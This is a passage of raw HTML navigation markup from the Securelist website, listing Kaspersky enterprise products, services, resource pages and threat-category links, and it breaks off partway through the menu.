data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/retail-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/retail-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Retail Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/retail-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Industries</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87724"><a href="https://www.kaspersky.com/enterprise-security/telecom?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Telecom Cybersecurity</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87725"><a href="https://www.kaspersky.com/enterprise-security/industries?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View all</a> </ul> </ul> <li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87726"><a href="https://www.kaspersky.com/enterprise-security/products?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Products</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87728"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112352"><a href="https://www.kaspersky.com/next?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><figure><img alt="" src="https://media.kasperskydaily.com/wp-content/uploads/sites/92/2024/04/10052437/k_Next_RGB_black_icon.png"></figure>Kaspersky Next <small class="label-inline red">NEW!</small></a><div class="desc"><p><a href="https://www.kaspersky.com/next?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112323"><a href="https://www.kaspersky.com/enterprise-security/xdr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>XDR</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/xdr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-endpoint-security_products menu-item menu-item-type-custom menu-item-object-custom menu-item-87727"><figure><a href="https://www.kaspersky.com/enterprise-security/endpoint?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/endpoint-security_products.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/endpoint?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Endpoint Security for Business</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/endpoint?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-endpoint-detection-and-response menu-item menu-item-type-custom menu-item-object-custom menu-item-112324"><figure><a href="https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/endpoint-detection-and-response.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>EDR Expert</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-hybrid-cloud-security_products menu-item menu-item-type-custom menu-item-object-custom menu-item-87730"><figure><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/hybrid-cloud-security_products.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>EDR Optimum</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-anti-targeted-attack-platform menu-item menu-item-type-custom menu-item-object-custom menu-item-87731"><figure><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/anti-targeted-attack-platform.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Anti Targeted Attack Platform</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112325"><a href="https://www.kaspersky.com/enterprise-security/cloud-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Hybrid Cloud Security</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/cloud-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112326"><a href="https://www.kaspersky.com/enterprise-security/sd-wan?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>SD-WAN</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/sd-wan?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-private-security-network menu-item menu-item-type-custom menu-item-object-custom menu-item-87732"><figure><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/private-security-network.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Industrial CyberSecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-embedded-systems-security menu-item menu-item-type-custom menu-item-object-custom menu-item-87733"><figure><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/embedded-systems-security.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Container Security</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Products</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112328"><a href="https://www.kaspersky.com/enterprise-security/products/internet-gateway?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Security for Internet Gateway</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112329"><a href="https://www.kaspersky.com/enterprise-security/embedded-systems?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Embedded Systems Security</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112330"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-iot-infrastructure-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky IoT Infrastructure Security</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112331"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-secure-remote-workspace?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Secure Remote Workspace</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112332"><a href="https://www.kaspersky.com/enterprise-security/mail-server-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Security for Mail Server</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87740"><a target="_blank" href="https://www.kaspersky.com/enterprise-security/products?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View All</a> </ul> </ul> <li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87741"><a href="https://www.kaspersky.com/enterprise-security/services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Services</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87742"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item icon-cybersecurity-services menu-item menu-item-type-custom menu-item-object-custom menu-item-87743"><figure><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/cybersecurity-services.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Cybersecurity Services</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-105619"><a href="https://www.kaspersky.com/enterprise-security/security-awareness?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Security Awareness</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/security-awareness?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-premium-support menu-item menu-item-type-custom menu-item-object-custom menu-item-87745"><figure><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/premium-support.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Premium Support</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-intelligence menu-item menu-item-type-custom menu-item-object-custom menu-item-87746"><figure><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-intelligence.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Threat Intelligence</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-incident-response menu-item menu-item-type-custom menu-item-object-custom menu-item-87748"><figure><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/incident-response.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Managed Detection and Response</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-hunting menu-item menu-item-type-custom menu-item-object-custom menu-item-87747"><figure><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-hunting.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Compromise Assessment</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-hunting menu-item menu-item-type-custom menu-item-object-custom menu-item-112333"><figure><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-hunting.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>SOC Consulting</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Services</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87751"><a href="https://www.kaspersky.com/enterprise-security/professional-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Professional Services</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87752"><a href="https://www.kaspersky.com/enterprise-security/incident-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Incident Response</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87753"><a href="https://www.kaspersky.com/enterprise-security/cyber-security-training?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Cybersecurity Training</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87755"><a href="https://www.kaspersky.com/enterprise-security/services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View All</a> </ul> </ul> <li class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87756"><a href="https://www.kaspersky.com/enterprise-security/resources?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Resource Center</a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87757"><a href="https://www.kaspersky.com/enterprise-security/resources/case-studies?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Case Studies</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87758"><a href="https://www.kaspersky.com/enterprise-security/resources/white-papers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">White Papers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87759"><a href="https://www.kaspersky.com/enterprise-security/resources/data-sheets?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Datasheets</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87760"><a href="https://www.kaspersky.com/enterprise-security/wiki-section/home?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Technologies</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105620"><a href="https://www.kaspersky.com/MITRE?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">MITRE ATT&#038;CK</a> </ul> <li class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87761"><a href="https://www.kaspersky.com/about?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">About Us</a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105621"><a href="https://www.kaspersky.com/about/transparency?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Transparency</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105622"><a href="https://www.kaspersky.com/about/press-releases?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Corporate News</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105623"><a href="https://press.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Press Center</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105624"><a href="https://www.kaspersky.com/about/careers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Careers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105626"><a href="https://www.kaspersky.com/about/sponsorships/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Sponsorship</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105627"><a href="https://www.kaspersky.com/about/policy-blog?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Policy Blog</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105628"><a href="https://www.kaspersky.com/about/contact?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Contacts</a> </ul> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87762"><a href="https://www.kaspersky.com/gdpr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">GDPR</a> </ul> </nav> </div> </header> <div class="mobile-menu-wrapper mobile-menu-wrapper--dark"> <ul class="mobile-nav" data-back="Back"> <li class="selector"> <a data-element-id="subscribe-button" href="#modal-newsletter" class="button-link js-modal-open"><i class="font-icons icon-envelope"></i>Subscribe</a> <a href="#" class="button-link c-theme-switcher js-theme-switcher"><i class="font-icons icon-moon"></i> Dark mode<span class="u-hidden u-inline--dark"> off</span></a> <a data-element-id="login-button" href="#" class="button-link js-kaspersky-sso-login"><svg class="o-icon o-svg-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-user"></use></svg>Login</a> </li> <li class="title"> <span>Securelist menu</span> </li> <li class="parent" data-parent data-icon="top-item"><a data-element-id="lang-selector" href="#" class=""><i class="top-item"></i><span>English</span></a><ul class="submenu"><li class="menu-item"><a href="https://securelist.ru">Russian</a></li><li class="menu-item"><a href="https://securelist.lat">Spanish</a></li></ul> <li class="parent" data-parent="Existing Customers" data-icon="font-icons top-item"><a rel="Existing Customers" href="#"><i class="font-icons top-item"></i><span>Existing Customers</span></a> <ul class="submenu"> <li class="parent" data-parent="Personal" data-icon="top-item"><a rel="Personal" href="#"><i class="top-item"></i><span>Personal</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87860"><a href="https://my.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">My Kaspersky</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105987"><a href="https://www.kaspersky.com/renewal-center/home?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Renew your product</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105988"><a href="https://www.kaspersky.com/downloads?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Update your product</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105989"><a href="https://support.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Customer support</a> </ul> <li class="parent" data-parent="Business" data-icon="top-item"><a rel="Business" href="#"><i class="top-item"></i><span>Business</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105991"><a href="https://ksos.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">KSOS portal</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105992"><a href="https://cloud.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Kaspersky Business Hub</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105993"><a href="https://support.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Technical Support</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105994"><a href="https://www.kaspersky.com/small-to-medium-business-security/resources?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Knowledge Base</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105995"><a href="https://www.kaspersky.com/renewal-center/vsb?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Renew License</a> </ul> </ul> <li class="parent" data-parent="Home" data-icon="font-icons top-item"><a rel="Home" href="#"><i class="font-icons top-item"></i><span>Home</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87778"><a href="https://www.kaspersky.com/home-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Products</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87771"><a href="https://www.kaspersky.com/downloads?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Trials&#038;Update</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87859"><a href="https://www.kaspersky.com/resource-center?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Resource Center</a> </ul> <li class="parent" data-parent="Business" data-icon="top-item"><a rel="Business" href="#"><i class="top-item"></i><span>Business</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112353"><a href="https://www.kaspersky.com/next?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Kaspersky Next</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87776"><a href="https://www.kaspersky.com/small-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Small Business (1-50 employees)</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87782"><a href="https://www.kaspersky.com/small-to-medium-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Medium Business (51-999 employees)</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87783"><a href="https://www.kaspersky.com/enterprise-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Enterprise (1000+ employees)</a> </ul> <li class="splitter"></li> <li class="title"><span>Securelist</span> <li class="parent" data-parent="" data-icon="top-item"><a href="https://securelist.com/threat-categories/"><i class="top-item"></i><span>Threats</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89472"><a href="https://securelist.com/threat-category/financial-threats/">Financial threats</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89467"><a href="https://securelist.com/threat-category/mobile-threats/">Mobile threats</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89471"><a href="https://securelist.com/threat-category/web-threats/">Web threats</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89468"><a href="https://securelist.com/threat-category/secure-environment/">Secure environment (IoT)</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89470"><a href="https://securelist.com/threat-category/vulnerabilities-and-exploits/">Vulnerabilities and exploits</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89466"><a href="https://securelist.com/threat-category/spam-and-phishing/">Spam and Phishing</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89469"><a href="https://securelist.com/threat-category/industrial-threats/">Industrial threats</a> </ul> <li class="parent" data-parent="" data-icon="top-item"><a href="https://securelist.com/categories/"><i class="top-item"></i><span>Categories</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-87880"><a href="https://securelist.com/category/apt-reports/">APT 